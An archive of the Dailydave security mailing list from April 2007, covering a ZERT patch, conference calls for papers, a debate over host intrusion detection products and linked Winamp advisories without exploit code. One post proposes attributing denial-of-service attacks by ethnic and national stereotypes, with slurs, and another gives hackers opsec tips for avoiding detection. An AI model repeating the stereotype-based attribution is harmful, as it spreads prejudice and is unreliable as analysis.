From ge at linuxbox.org Sun Apr 1 22:58:04 2007
From: ge at linuxbox.org (Gadi Evron)
Date: Sun, 1 Apr 2007 21:58:04 -0500 (CDT)
Subject: [Dailydave] ZERT's latest patch

I would like to leave the 0day behind for now and just stare!

The patch is just beautiful. Active patching in memory, no static address... rather generic patching in memory, searching for several signatures.

Beautiful work from Gil Dabah.

Take a look:
http://zert.isotf.org/advisories/zert-2007-01.htm

Gadi.

From neal.krawetz at mac.hush.com Mon Apr 2 12:54:39 2007
From: neal.krawetz at mac.hush.com (neal.krawetz at mac.hush.com)
Date: Mon, 02 Apr 2007 11:54:39 -0500
Subject: [Dailydave] Death by Cockatoo
Message-ID: <20070402165440.1F58222826@mailserver9.hushmail.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I got bit by a wild cockatoo.

It was a white, sulfur-crested cockatoo. It seems they have learned to eat out of people's hands -- so I (and most other people on the tour bus) were feeding them. A few of the birds learned that if they bite or scratch the hand that feeds them, then the other hand will drop all of the food it is holding.

One bird scratched my hand (didn't break the skin, but it did startle me and I dropped food). Another bird began stalking me. Every time I tried to feed anyone else, he was there. He ended up biting my thumb -- more like a 1/2 inch paper cut. However, I didn't drop the food for him.

Net result? Bird drew blood and didn't get seeds. And I learned that the antiseptic liquid in wet-wipes burns like hell.

How does this relate to computer security? Many organized crime gangs use hostile tactics such as DDoS to blackmail companies into handing over money. And on a smaller scale, I know a half dozen users without any ethical or social values who use impersonation and deceitful tactics to intimidate honest netizens.
Like the wild cockatoo, don't give in to these threats or they will only be encouraged, continuing their abuses on other people and escalating from scratches to bites.

-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.5

wpwEAQECAAYFAkYRNQUACgkQDpFP8dW5K4Y6rgP/ZTY2Ewm6VK+uTp54zny1mOrm8z03
5z3O/jXH0GN1v4vs5SG40WRLH3xT/iFEO+h4Xgcu+tqD4tWBP8b7s/cbvz96ewN1KQ+H
S2oXwN03YDpUSRMwXfBUaMUwx0sO7AJ2qcLI8FW4ovuQdElC0VofoBVFgR4qbR3GLoq1
BxguqJ8=
=ZjX7
-----END PGP SIGNATURE-----

From rd at vnsecurity.net Mon Apr 2 15:19:15 2007
From: rd at vnsecurity.net (rd)
Date: Mon, 02 Apr 2007 22:19:15 +0300
Subject: [Dailydave] [CFP] VNSECON 07 - Call for Papers / HCMC - August 03-04, 2007
Message-ID: <46115733.70707@vnsecurity.net>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

``
~ @@ ==VNSECURITY==

CALL FOR PAPERS

|=---------------------=[ VNSECON 2007 ]=----------------------=|
|=-------------------------------------------------------------=|
|=-------------------=[ August 3-4, 2007 ]=--------------------=|
|=--------------=[ Ho Chi Minh City, Vietnam ]=----------------=|

cfp @ vnsecurity.net
[ http://conf.vnsecurity.net/cfp2007.txt ]

The Call for Papers for VNSECON Security Conference 2007 is now open. VNSECON 2007 is a security conference taking place downtown in Ho Chi Minh City (aka Saigon), Vietnam from the 3rd to 4th of August 2007. Some invited papers have been confirmed, but a limited number of speaking slots are still available.

--[ Introduction

VNSECON 2007 aims to be an event that enables the dissemination, discussion and sharing of security information between security communities. We organize a conference that gathers security experts, from the mainstream network security arena as well as the underground community, to share their research, discoveries and experiences.
We promise to make VNSECON a great and fun event for all security enthusiasts, regardless of the colors on their hats.

--[ The Venue

Ho Chi Minh City, fondly referred to as Saigon - "The Pearl of the Orient", still retains a charm reminiscent of its French-European heritage in the midst of rapid commercialization. The city promises an endless fascination for travelers wanting to explore Vietnam's rich 4,000-year history. It is a bustling, dynamic and industrious center, the largest city in the country, the economic capital and the cultural trendsetter. The streets, where much of the city's life takes place, are a myriad of street markets, shops, pavement cafes, stands-on-wheels and vendors selling wares spread out on sidewalks.

More info: http://conf.vnsecurity.net/venue

--[ Topics

Topics that will be considered include, but are not limited to:

- 0dayz
- Web Security
- Criminal Laws
- GSM, GPRS and CDMA Security
- VoIP Security / Hacking
- Wireless Security / Hacking
- Exploitation
- Attack and Defense Techniques
- Access Control and Authentication
- Reverse Engineering
- Application Security, Testing, Fuzzing
- Code Auditing
- Virtualization
- Malicious Code
- Viruses, Worms, and Trojans
- Spyware, Phishing and Botnets
- Banking Security
- Phreaking
- Cryptography
- Forensics

--[ Submissions

Deadline for abstract submission: June 08th, 2007
Deadline for panel submission: June 15th, 2007
Deadline for paper submission: July 07th, 2007

Paper proposals should consist of the following information:

1) Topic synopsis, title, and a one paragraph description.
2) Presenter information (name, handle, country of origin / passport) and contact information (e-mail, postal address, phone, fax).
3) Employer and/or affiliations.
4) Brief biography, list of publications and papers.
5) Any significant presentation and educational experience / background.
6) Reason why this material is innovative, significant or an important tutorial.
7) Will you have full text available or only slides?

Please send your submission to cfp @ vnsecurity.net. Please include the plain text version of this information in your email as well as any file, pdf, doc, sxw, ppt, or html attachments. Note that all speakers will be allocated 50 minutes of presentation time. If you require more time, please inform us in your submission.

--[ Speakers' Privileges

1) Accommodation will be provided (03 nights). We may be able to cover your traveling expenses, but only if you let us know in advance in your submission.
2) Conference party.
3) Half-day tour after the conference to the Cu Chi Tunnels, an immense network of connecting underground tunnels from the Vietnam War (http://en.wikipedia.org/wiki/Cu_Chi_tunnels). Bonus: 5 rounds of firing an AK-47 in the shooting range.
4) A large amount of free beer!

--[ Program Committee (alphabetical order)

1) Andrew Griffiths (Ruxcon, pulltheplug.org)
2) Dug Song (Arbor Networks, monkey.org)
3) HD Moore (BreakingPoint Systems, Metasploit Project)
4) Nguyen Anh Quynh (AIST Japan, VNSECURITY)
5) Red Dragon (THC, HERT, VNSECURITY)
6) SeekZero - Le Dinh Long (VNSECURITY)
7) SK Chong (SCAN Associates)
8) Skyper - Ralf Kaiser (ex-Phrack, THC)
9) van Hauser (The Hackers Choice - THC)

--[ Capture the Flag

As part of VNSECON 2007, we organize an attack and defense "Capture The Flag" challenge. We are inviting speakers to contribute challenges for the CTF competition. We are also inviting security / hacker groups to join the competition. For further details on the CTF, please check the conference website and/or email ctf @ vnsecurity.net.

--[ Other Information

For further information on the conference and submissions, please feel free to visit the VNSECON 2007 website. On behalf of the VNSECURITY Team, we thank you and look forward to receiving your submissions.
#VNSECON 07 - http://conf.vnsecurity.net

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (GNU/Linux)

iD8DBQFGEVcyNksdd3G7gu8RAiZkAJ0dDMtYOMzCtsSCM85xvOq6VoAZIQCfZIBy
5dFPO4rIa4i6JDc/UHcgdSc=
=PvmT
-----END PGP SIGNATURE-----

From olef.anderson at gmail.com Mon Apr 2 16:54:51 2007
From: olef.anderson at gmail.com (Olef Anderson)
Date: Mon, 2 Apr 2007 13:54:51 -0700
Subject: [Dailydave] [CFP] VNSECON 07 - Call for Papers / HCMC - August 03-04, 2007
In-Reply-To: <46115733.70707@vnsecurity.net>
References: <46115733.70707@vnsecurity.net>
Message-ID: <9b4f936f0704021354p3313173vc5b091b0aaf9fa4@mail.gmail.com>

I don't see what is to be remembered so fondly about the colonial rape of Saigon by French imperialism? (You call that heritage? Doh!)

Long Live the Ho Chi Minh City!

regards,
olef

On 4/2/07, rd wrote:
> [VNSECON 2007 Call for Papers quoted in full; see the original post above]

From dave.aitel at gmail.com Mon Apr 2 19:58:05 2007
From: dave.aitel at gmail.com (Dave Aitel)
Date: Mon, 2 Apr 2007 19:58:05 -0400
Subject: [Dailydave] Risk Management Services

A HIDS shakeup? Sana takes in more money and Ross Brown gets fired from eEye's CEO all in the same day? I never can get anyone to buy HIDS. We often recommend it in our reports, but no company ever bites the bullet and does it. Perhaps when they think HIDS they think this: http://media1.break.com/dnet/media/content/pic2903.jpg .

I wanted to point out that Applied Security has posted the results from their shmoocon hacking contest (note that I come in last!).
http://www.appliedsec.com/conferences.html

They've also got a server set up so everyone can play, which, I have to say, takes cojones. I guess that's the sort of thing you can do when you are a sponsor for GRSecurity.

-dave
From kyle.c.quest at gmail.com Mon Apr 2 23:23:04 2007
From: kyle.c.quest at gmail.com (C Q)
Date: Mon, 2 Apr 2007 23:23:04 -0400
Subject: [Dailydave] Risk Management Services

There's probably two reasons why nobody wants to buy HIDS... First, which especially applies to Blink (made by eEye), it's because it's unusable... I turned it off and uninstalled it after using it for just a few minutes. Second, companies rely on their significant investments in firewalls, IPSes, application proxies, etc and they feel that they are protected enough (I'm not saying that they are correct in their assumptions, but that's what they usually think :-) ).

Companies do, however, buy other types of host-based "risk management systems" that try to protect their IP, sensitive information, etc, which also helps them with compliance (SOX, HIPAA, PCI, etc).

On 4/2/07, Dave Aitel wrote:
> [Dave Aitel's original post quoted in full; see above]
From dave.aitel at gmail.com Tue Apr 3 00:58:07 2007
From: dave.aitel at gmail.com (Dave Aitel)
Date: Tue, 3 Apr 2007 00:58:07 -0400
Subject: [Dailydave] Risk Management Services

According to Ryan Naraine[1], they're making 12 Million dollars a year selling that and Retina, so someone's using it. Oddly, it's the exact same amount of money that Sana just took in. Weird day in HIDS land.

I spent all night trying to massage the Mercur IMAP NTLM bug into submission. Still nothing. Sometimes the hoolios are the hardest exploits. Apparently people actually use these weird little Windows servers though so they're worth doing. That's what I'm telling myself, after 10 hours on Mercur, anyways.

-dave
[1]http://blogs.zdnet.com/security/?p=148

On 4/2/07, C Q wrote:
> [C Q's reply and the original post quoted in full; see above]

From trklisted at networksamurai.org Tue Apr 3 11:19:05 2007
From: trklisted at networksamurai.org (trklisted at networksamurai.org)
Date: Tue, 03 Apr 2007 11:19:05 -0400
Subject: [Dailydave] Risk Management Services
Message-ID: <26761558.1071175613545616.JavaMail.servlet@perfora>

An HTML attachment was scrubbed...
URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20070403/42fedac8/attachment.html

From pmelson at gmail.com Tue Apr 3 07:05:23 2007
From: pmelson at gmail.com (Paul Melson)
Date: Tue, 3 Apr 2007 07:05:23 -0400
Subject: [Dailydave] Risk Management Services
Message-ID: <40ecb01f0704030405ua9469f5r105d346a630153e3@mail.gmail.com>

On 4/3/07, Dave Aitel wrote:
> According to Ryan Naraine[1], they're making 12 Million dollars a year
> selling that and Retina, so someone's using it. Oddly, it's the exact same
> amount of money that Sana just took in. Weird day in HIDS land.

Well, someone's using Retina at least.
Which makes sense, since Nessus on pure Windows is still undoable and NVA/pentest work is a big-money consulting niche to this day. I've been off the road for 2 years, but I never saw and as far as I am aware still haven't met anyone that uses Blink. I've seen a few SecureIIS installs, though even that's probably a tough sell these days as it's no doubt getting harder to find people still running IIS 5 on Win2K.

That may be the real reason we're seeing Brown go - the $12M from 2006 doesn't seem sustainable without a new product and/or new marketing that will drive sales. Hell, I bet they'd sell better if Marc Maiffret just started posting to full-disclosure again.

http://marc.info/?l=full-disclosure&m=117524796007054&w=2

Speak of the devil. :-)

Anyway, I think the reason HIDS in general doesn't see a lot of widespread adoption is that companies view their production networks - especially where Windows is running, where HIDS gets the most traction - as fragile. They don't want "agents" or "clients" or anything that could hurt performance or stability. And while I haven't personally ever touched Blink, I've seen its competition implode when installed in just the wrong environment. That, and at still roughly 5-10x the per-seat cost of AV products, it's hard to sell a product that basically does what IT managers think AV does.

PaulM

From cisoguy at gmail.com Tue Apr 3 14:06:46 2007
From: cisoguy at gmail.com (Jeff Moore)
Date: Tue, 3 Apr 2007 11:06:46 -0700
Subject: [Dailydave] Risk Management Services
Message-ID: <97775f7a0704031106k1cf9d9f1u64beea7a8fa298e6@mail.gmail.com>

12 million is not a lot of money all things considered. Which is one reason to be careful when selecting a security vendor. You want one that will be around in the future. This is one reason why my organization passed on purchasing Blink from eEye. That, plus the fact that we found the product to be completely unusable and that it does not offer effective protection; the blue screens it caused when running with certain applications were a nice touch, but not one we wanted on our network.

We are a large health care provider; our pilot group was 2500 systems and we have opted to go with the McAfee solution. While it was not perfect, it was nowhere near as bad as the eEye offering and at least it didn't crash our systems. Trust me on this one, we spent a lot of time in our lab testing these things and you would be surprised, once you actually get Blink to work, how insecure and even worse how unstable your system is.

J

From adriel at netragard.com Tue Apr 3 14:33:19 2007
From: adriel at netragard.com (Adriel T. Desautels)
Date: Tue, 03 Apr 2007 14:33:19 -0400
Subject: [Dailydave] Risk Management Services

Host Intrusion Detection Systems by their very nature require that they are deployed on each host to be monitored. That creates a scalability and management issue. IDS/IPS is centralized for the most part. You simply install an agent at the "focal" points of the network(s) and monitor all ingress and egress traffic.

On 4/2/07 11:23 PM, "C Q" wrote:

> There's probably two reasons why nobody wants to buy HIDS...
> First, which especially applies to Blink (made by eEye), it's
> because it's unusable... I turned it off and uninstalled it
> after using it for just a few minutes. Second, companies
> rely on their significant investments in firewalls, IPSes,
> application proxies, etc and they feel that they are protected
> enough (I'm not saying that they are correct in their assumptions,
> but that's what they usually think :-) ).
>
> Companies do, however, buy other types of host-based
> "risk management systems" that try to protect their IP,
> sensitive information, etc, which also helps them with compliance
> (SOX,HIPAA,PCI,etc).
>
> On 4/2/07, Dave Aitel wrote:
>> [Dave Aitel's original post quoted in full; see above]

--
Regards,
Adriel T. Desautels
Chief Technology Officer - Netragard, LLC
Office: 617-934-0269 || Mobile : 857-636-8882
http://www.linkedin.com/pub/1/118/a45
http://www.netragard.com
-------------------------
"We make IT secure."

From mark.teicher at gmail.com Tue Apr 3 15:54:08 2007
From: mark.teicher at gmail.com (Mark Teicher)
Date: Tue, 3 Apr 2007 15:54:08 -0400
Subject: [Dailydave] Risk Management Services
In-Reply-To: <26761558.1071175613545616.JavaMail.servlet@perfora>
References: <26761558.1071175613545616.JavaMail.servlet@perfora>
Message-ID: <300c487a0704031254x2d00fef9u947b6b58cebf3375@mail.gmail.com>

Can you actually pull data from the management station and produce legible reports yet??

On 4/3/07, trklisted at networksamurai.org wrote:
>
> I have about 1500 blink agents deployed at my hospital here in miami.
> I've been on the product since it was unusable (version 1.2). Version 2.0 was awesome,
> 3.0 is better. I have taken it to a bunch of war nets and different cons
> and it stands up.
>
> Although it's a part of the fabric it's not all of the fabric, we have been
> worm / botnet / virus free for the most part since we've completed that
> overhaul of the security fabric of that net.
>
> moses, networksamurai.org
>
> [Dave Aitel's reply, C Q's reply and the original post quoted in full below in the original; see above]
URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20070403/f84c97fa/attachment.htm From trklisted at networksamurai.org Tue Apr 3 16:17:15 2007 From: trklisted at networksamurai.org (trklisted[at]networksamurai[dot]org) Date: Tue, 03 Apr 2007 16:17:15 -0400 Subject: [Dailydave] Risk Management Services In-Reply-To: <300c487a0704031254x2d00fef9u947b6b58cebf3375@mail.gmail.com> References: <26761558.1071175613545616.JavaMail.servlet@perfora> <300c487a0704031254x2d00fef9u947b6b58cebf3375@mail.gmail.com> Message-ID: <4612B64B.7020406@networksamurai.org> REM 2 (The main management station for all products), that was pretty bad... REM 3 is very good and I am getting better reports like it actually reports blink attacks, and I can get hardware delta's... If you saw it about 1 year ago... i feel your pain.... Mark Teicher wrote: > Can you actually pull data from the management station and produce > legible reports yet?? > > On 4/3/07, *trklisted at networksamurai.org > * > wrote: > > I have about 1500 blink agents deployed at my hospital here in > miami. I've been on the product since it was unusable (version > 1.2). Version 2.0 was awesome, 3.0 is better. I have taken it to a > bunch of war nets and different cons and it stands up. > > Although its a part of the fabric its not all of the fabric, we > have been worm / botnet / virus free for the most part since we've > completed that overhaul of the security fabric of that net. > > moses, networksamurai.org > > > From cisoguy at gmail.com Tue Apr 3 16:31:18 2007 From: cisoguy at gmail.com (Jeff Moore) Date: Tue, 3 Apr 2007 13:31:18 -0700 Subject: [Dailydave] Risk Management Services In-Reply-To: <40ecb01f0704030405ua9469f5r105d346a630153e3@mail.gmail.com> References: <40ecb01f0704030405ua9469f5r105d346a630153e3@mail.gmail.com> Message-ID: <97775f7a0704031331o736b017cv9c22ac0c09978293@mail.gmail.com> On 4/3/07, Paul Melson wrote: > Well, someone's using Retina at least. 
> Which makes sense, since Nessus
> on pure Windows is still undoable and NVA/pentest work is a big-money

Have you seen the state of Retina lately? It appears, at least as a customer,
that they have put all resources into Blink, which is a bad move. Their
coverage for Windows issues is now limited to simply checking registry keys
for patches, and their alternative operating system scanning is broken and
never yields consistent results. Somehow I have a hard time trusting a
solution that can give different results each time you scan the same system
on the same day where there have been no changes. This would be why we are
now looking at Tenable and nCircle for our VA needs.

> http://marc.info/?l=full-disclosure&m=117524796007054&w=2

Too bad their patch for that issue was sloppy and very much like Blink.
Ineffective.

> Anyway, I think the reason HIDS in general doesn't see a lot of
> widespread adoption is that companies view their production networks -
> especially where Windows is running, where HIDS gets the most traction
> - as fragile. They don't want "agents" or "clients" or anything that
> could hurt performance or stability. And while I haven't personally
> ever touched Blink, I've seen its competition implode when installed
> in just the wrong environment. That, and at still roughly 5-10x the
> per-seat cost of AV products, it's hard to sell a product that
> basically does what IT managers think AV does.

I mostly agree. In our installation, we spent a lot of lab time testing all
of the potential HIPS solutions, and once we decided on one we spent even
more time in our lab tweaking it to not break our applications and to not
cause instability.

J

From neal.krawetz at mac.hush.com Wed Apr 4 09:12:43 2007
From: neal.krawetz at mac.hush.com (neal.krawetz at mac.hush.com)
Date: Wed, 04 Apr 2007 08:12:43 -0500
Subject: [Dailydave] Stereotyping DoS and Don'ts
Message-ID: <20070404131244.04712DA82F@mailserver7.hushmail.com>

While nobody likes to be stereotyped, there is always truth behind the
generic, nationality-based profiles. For example, I was recently in
Australia as part of a necessary trip. I was waiting with a small crowd of
people outside a grocery store, waiting for it to open. I could instantly
separate the tourists from the locals.

There was a large set of people standing by the door. They didn't move; if
it weren't for the occasional breath, I would have thought they were
statues. They were the local Aussies. They were patiently waiting for the
doors to open.

A minority of the people were more anxious. They would shuffle their feet,
constantly look around for a place to sit (benches are a rarity outside of
tourist areas), and check and recheck their watches. They were the tourists.

The grocery store was supposed to open at 7:00am. At 6:59 and 28 seconds, a
trio came down the escalator. They never checked their watches and never
looked for a clock, yet they appeared concerned that the store was not open.
I knew their nationality even before they spoke: punctual to the second,
knowing the time without a watch? Jews.

All of this makes me wonder... could stereotyping by nationality act as a
first pass for identifying some cybercrimes, such as denial-of-service
attacks? For example:

* Western Europe is usually punctual to the second and well planned. A DoS
  should start at a precise time and last a precise duration. It should not
  vary from the plan during the attack.

* Chinese value punctuality and uniformity. A DoS should be similar to
  Western Europe, but should not vary in attack methods. For example, if
  there are 10,000 computers being used in an attack, they will all be
  configured the same way and used the same way. You won't see a variety of
  simultaneous attacks.

* Latin America and Mexico value content over punctuality. It's OK to be
  late as long as you contribute. A DoS may not start on time or appear
  initially organized or even homogeneous, but all attack-bots should
  contribute to the fray.

* The USA and Canada are stereotypical in that they are not extreme in any
  single dimension. An attack may not start precisely at 1:00, but it will
  be "around 1:00"; it may not be homogeneous, but it will be close. And it
  may change as needed rather than exhaust one attack method. Americans are
  also more solitary. You won't see a hundred American hackers working in
  unison on the same target as you would in China or Brazil.

Using these generic and empirical profiles, we can start guesstimating who
is behind some known attacks. For example:

* The recent DoS against the root level DNS servers started exactly on the
  hour. At intervals of 1 hour, there were changes to the attack method.
  Both Western Europe and China match this kind of attack: precisely timed,
  planned, homogeneous, and exhaustive.

* The attack against Blue Frog did not start at any particular hour/minute,
  but it was well choreographed. Each time the attack succeeded and Blue
  Frog moved on to an alternate safe haven, a new attack method would be
  initiated. Planned, yet not long-term planning. There was also only one
  type of attack at a time, suggesting an individual or very small group.
  This sounds like an American or Canadian.

* Similar to Blue Frog, the Smurf attacks from Mafiaboy were not precisely
  timed, but were exhaustive, showed short-term planning, and were
  independent attacks. Mafiaboy was Canadian.

* The recent DoS against GoDaddy was reportedly spread across a few days,
  building as it went. It was a variety of attack methods that all assisted
  in the total attack. This sounds like Latin America, and the hacker groups
  in Brazil immediately come to mind.

Stereotyping and profiling are commonly criticized for their inaccuracy. Not
every American is fat, self-absorbed, and eats doughnuts for breakfast.
Similarly, there is fuzziness since people may not be located in their
influencing country. For example, a Brazilian who is married to a German and
living in Canada may appear as any one of the stereotypes, or as a
combination. (Then again, a Brazilian married to a German and living in
Canada is probably not stereotypical, since Germans are too intelligent to
marry coconuts.)

However, profiling can be used to organize information before wasting time
in an exhaustive search for a likely suspect. It will take time to develop
this profile method from empirical to practical. And it leaves me wondering:
can stereotyping network attacks be turned into something more definitive?

Thanks to the Internet Storm Center for their feedback and valuable
comments.

--
Dr. Neal Krawetz, PhD

From bania.piotr at gmail.com Fri Apr 6 05:46:53 2007
From: bania.piotr at gmail.com (Piotr Bania)
Date: Fri, 06 Apr 2007 11:46:53 +0200
Subject: [Dailydave] AOL Nullsoft Winamp LIBSNDFILE.DLL Remote Memory Corruption (Off By Zero)
Message-ID: <4616170D.6090309@gmail.com>

AOL Nullsoft Winamp LIBSNDFILE.DLL Remote Memory Corruption (Off By Zero)
by Piotr Bania
http://www.piotrbania.com

Severity: Critical - Possible remote code execution.

Software affected: Tested on AOL Nullsoft Winamp v5.33 (x86) Feb 13 2007
(on Windows XP SP1/SP2). There exists a large possibility that any other
software that is using the LIBSNDFILE.DLL component should be considered
vulnerable.

Original url: http://www.piotrbania.com/all/adv/nullsoft-winamp-libsndfile-adv.txt

best regards,
pb

--
Piotr Bania - - 0xCD, 0x19
Fingerprint: 413E 51C7 912E 3D4E A62A BFA4 1FF6 689F BE43 AC33
http://www.piotrbania.com - Key ID: 0xBE43AC33
- "The more I learn about men, the more I love dogs."
From bania.piotr at gmail.com Fri Apr 6 05:47:12 2007
From: bania.piotr at gmail.com (Piotr Bania)
Date: Fri, 06 Apr 2007 11:47:12 +0200
Subject: [Dailydave] AOL Nullsoft Winamp IT Module "IN_MOD.DLL" Remote Heap Memory Corruption
Message-ID: <46161720.4020507@gmail.com>

AOL Nullsoft Winamp IT Module "IN_MOD.DLL" Remote Heap Memory Corruption
by Piotr Bania
http://www.piotrbania.com

Severity: Important - Potential remote code execution.

Software affected: Tested on AOL Nullsoft Winamp v5.33 (x86) Feb 13 2007
(on Windows XP SP1/SP2).

Original url: http://www.piotrbania.com/all/adv/nullsoft-winamp-it_module-in_mod-adv.txt

best regards,
pb

From bania.piotr at gmail.com Fri Apr 6 05:47:04 2007
From: bania.piotr at gmail.com (Piotr Bania)
Date: Fri, 06 Apr 2007 11:47:04 +0200
Subject: [Dailydave] AOL Nullsoft Winamp S3M Module "IN_MOD.DLL" Remote Heap Memory Corruption
Message-ID: <46161718.5020808@gmail.com>

AOL Nullsoft Winamp S3M Module "IN_MOD.DLL" Remote Heap Memory Corruption
by Piotr Bania
http://www.piotrbania.com

Severity: Important - Potential remote code execution.

Software affected: Tested on AOL Nullsoft Winamp v5.33 (x86) Feb 13 2007
(on Windows XP SP1/SP2).

Original url: http://www.piotrbania.com/all/adv/nullsoft-winamp-s3m_module-in_mod-adv.txt

best regards,
pb
From dave at immunityinc.com Sat Apr 7 13:29:21 2007
From: dave at immunityinc.com (Dave Aitel)
Date: Sat, 07 Apr 2007 13:29:21 -0400
Subject: [Dailydave] Opsec for Hackers aka "Don't pee in your own pool"
Message-ID: <4617D4F1.8010202@immunityinc.com>

http://blog.wired.com/27bstroke6/2007/04/court_okays_cou.html

"""
The case began in December 1999, when an official at Qualcomm in San Diego
detected a hack attack against the company's system, and notified both the
FBI, and administrators at the apparent source of the attack -- the
University of Wisconsin at Madison.

UWisc system administrator Jeffrey Savoy tracked the intrusion to
Heckenkamp's dorm computer, and then determined that Heckenkamp was also
trying to hack into the university's mail server. Savoy blocked the hacker's
IP address, which ended in 117, but Heckenkamp, being a pretty smart guy,
changed it. That's when Savoy turned the tables and counter-cracked the
suspect computer, supposedly for the limited purpose of determining if it
really was the same system with a different IP address, and to protect the
university server from further attack
"""

Opsec is hard, and one of the hardest things about it is that it contradicts
the naturally aggressive tendencies a hacker must have to be successful.
Most hackers spend most of their time prepping and building a tool-chain.[1]
Once they have a decent capability, they find that everything looks like a
target. Every hotel they stay at has a vulnerable machine they could use as
a bounce-point later. Every airport they fly through. Their neighbors. Their
schools.

Having a good tool-chain means that their technical operational security is
air-tight. Chances of getting caught for any one (or any large group) of
attacks are reasonably low. But what they do when they hack things they are
close to is create a signature for themselves in what the .mil likes to term
"the information battlespace". Good opsec requires that nothing connected to
the hacker personally is ever touched, no matter how tempting. You never own
anything you would care about.

Don't pee in your own pool.

-dave

[1] A tool-chain differs from a "tool kit" in that it is an integrated and
linked set of tools that take you from recon to penetration to long term
data exfiltration.

From dtangent at defcon.org Mon Apr 9 21:43:03 2007
From: dtangent at defcon.org (The Dark Tangent)
Date: Mon, 09 Apr 2007 18:43:03 -0700
Subject: [Dailydave] DEF CON One Five CfP in effect!
Message-ID: <200704100143.l3A1hoOB008165@colossus.datamerica.com>

Hey Daily Dave readers, here is a (long) version of the DEF CON CfP
announcement.

DEFCON 15 Call For Papers is now officially Open and will close on June 15,
2007.

Don't know what DEFCON is? Go to https://www.defcon.org/ and clue up!

Papers and presentations are now being accepted for DEFCON 15, the
conference your mother and ISC(2) warned you about. DEFCON will take place
at the Riviera in Las Vegas, NV, USA, August 3-5, 2007.

Last year, we eliminated speaking tracks, and we received a diverse
selection of submissions. From hacking your car, your brain, and CIA
sculptures to hacking the vote, Bluetooth, and DNS hacks. We group
presentations by subject and come up with topic areas of interest. It worked
out so well in the past we are doing it again.

What are we looking for then, if we don't have tracks? We're looking for the
presentation that you've never seen before and have always wanted to see. We
are looking for the presentation that the attendees wouldn't ask for, but
blows their minds when they see it. We want strange demos of Personal GPS
jammers, RFID zappers, and HERF madness. Got a MITM attack against cell
phones? We want to see it.
Subjects that we have traditionally covered in the past, and will continue
to accept include: Trojan development, worms, malware, intelligent agents,
protocol exploits, application security, web security, database hacking,
privacy issues, criminal law, civil law, international law/treaties,
prosecution perspectives, 802.11X, bluetooth, cellular telephony protocols,
privacy, identity theft, identity creation, fraud, social implications of
technology, media/film presentations, firmware hacking, hardware hacking,
embedded systems hacking, smartcard technologies, credit card and financial
instrument technologies, surveillance, counter-surveillance, UFO's,
peer2peer technologies, reputation systems, copyright infringement and
anti-copyright infringement enforcement technologies, critical
infrastructure issues, physical security, social engineering, academic
security research, PDA and cell phone security, EMP/HERF weaponry, TEMPEST
technologies, corporate espionage, IDS evasion.

What a mouthful! Well, you can't say we didn't give you some ideas. This
list is not intended to limit possible topics, merely to give examples of
topics that have interested us in the past, and is in fact the same list we
used last year. Check out https://www.defcon.org/html/defcon-14/dc-14-speakers.html
for past conference presentations to get a complete list of past topics that
were accepted if you want to learn from the past.

We are looking for and give preference to: unique research, new tool
releases, ? day attacks (with responsible disclosure), highly technical
material, social commentaries, and ground breaking material of any kind.
Want to screen a new hacking documentary or release research? Consider
DEFCON.

Speaking Formats:

Choose between 12 hundred seconds, 50 minutes, 110 minutes, or a break out
format of a length you determine.

We are continuing the Twelve Hundred Second Spotlight, which is a shorter
presentation (about twenty minutes) that doesn't warrant a full 50 or 110
minute talk. The Twelve Hundred Second Spotlight is designed for those who
don't have enough material for a full talk, but still have a valuable
contribution to make. This is to ensure that great ideas that can be
presented quickly don't fall through the cracks merely because they didn't
justify a full length talk. Examples include research, announcements, group
presentations, projects needing volunteers or testers, requests for
comments, updates on previously given talks, quick demonstrations. You get
the idea. Presenters will get a speaker badge which entitles them to free
admittance to DEFCON, but we will be unable to pay an Honorarium.

Remember being attacked by flying meat? Do you remember thick accented
Germans trying to convince you to attack critical infrastructure? Do you
remember extravagant vapor ware releases by a stage filled with posses? We
do, and sans projectiles of raw meat we want to encourage such shenanigans
again this year. We are calling on all "hacker groups" (you know who you
are, and the FBI has a nifty file with your name on it) to present at
DEFCON, to discuss what you're up to, what your mission is, to discuss any
upcoming or past projects, and to discuss parties/conferences you are
throwing. We do humbly request that all gang warfare be relegated to
electronic attacks, and not fall over into meat space.

New for DEFCON 15:

The second year being at the Riviera has allowed us to make some changes to
the format from last year. We have more speaking rooms, and because of this
I want to announce a call for workshops, demos, and mini trainings. We have
additional small rooms that will enable highly focused demonstrations or
workshops. If you want to talk about building a passport cloner or a
tutorial on developing Metasploit exploits this might be the format for you.
You tell us how much time you need, and we try to accommodate you!

To submit a speech

Complete the Call for Papers Form at:
https://www.defcon.org/html/defcon-15/dc-15-cfp-form.html
and send to talks at defcon dot org. You will receive a confirmation within
48 hours of submission.

We are going to continue last year's goal of increasing the quality of the
talks by screening people and topics. I realize you guys are speaking for
basically free, but some talks are better than others. Some people put in a
bit more effort than others. I want to reward the people who do the work by
making sure there is room for them.

This year we will have two rounds of speaker acceptance. In the first round
we will fill about half of the schedule before the submission deadline, and
the remaining half afterwards. This is to encourage people to submit as
early as possible and allows attendees to plan on the topics that interest
them. If you see the schedule on-line start to fill, do not worry if you
have not heard from us yet, as we are still in the process of selection.
Barring a disaster of monstrous proportions, speaker selection will be
completed no later than July 1.

The sooner you submit, the better the chance that the reviewers can give
your presentation the full consideration it warrants. If you wait until the
last minute to submit, you have less of a chance of being selected.

After a completed CFP form is received, speakers will be contacted if there
are any questions about their presentations. If your talk is accepted you
can continue to modify and evolve it up until the last minute, but don't
deviate from your accepted presentation. We will mail you with information
on deadlines for when we need your presentation, to be burnt on the CDROM,
as well as information for the printed program.

Speakers get in to the show free, get paid (AFTER they give a good
presentation!), get a coolio badge, and people like you more. Heck, most
people find it is a great way to meet people or find other people interested
in their topics. Speakers can opt to forgo their payment and instead receive
three human badges that they can give to their friends, sell to strangers,
or hold onto as timeless mementoes. Receiving badges instead of checks has
been a popular option for those insisting on maintaining their anonymity.

Please visit:

https://www.defcon.org/ for previous conference archives, information, and
speeches. Updated announcements will be posted to news groups, security
mailing lists and this web site.

https://forum.defcon.org/ for a look at all the events and contests being
planned for DEFCON 15. Join in on the action.

https://pics.defcon.org/ to upload all your past DEFCON pictures. We store
the pictures so you don't have to worry about web space. If you have an
account on the forums, you have an account here.

https://www.defcon.org/defconrss.xml for news and announcements surrounding
